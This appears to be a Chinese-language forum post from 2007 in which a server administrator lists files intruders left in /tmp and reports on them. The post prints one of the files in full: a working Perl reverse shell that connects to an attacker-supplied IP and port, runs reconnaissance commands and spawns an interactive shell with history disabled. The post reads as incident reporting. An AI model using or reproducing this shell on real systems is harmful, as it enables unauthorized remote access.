tmp下的文件:
-rw-r--r-- 1 nobody nobody 358 Apr 13 18:30 temp2006
-rw-r--r-- 1 nobody nobody 480 Apr 11 15:13 out
-rwxr-xr-x 1 nobody nobody 142 Apr 11 04:16 go
-rw-r--r-- 1 nobody nobody 197 Apr 11 04:15 go.jpg
more temp2006
引用
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");
其它的就不一一列了。
还好权限是nobody,不知道是apache的漏洞,还是原来的一些开源的web程序,有些程序弄上去好久了,一直没有空去弄,也没有及时删除,祸害呀。
唐军 于 2007-10-04 19:34:48发表:
不是很明白:0(1
windwiny 于 2007-10-01 00:08:42发表:
得到的信息也没什么用的,用户名/路径/内核版本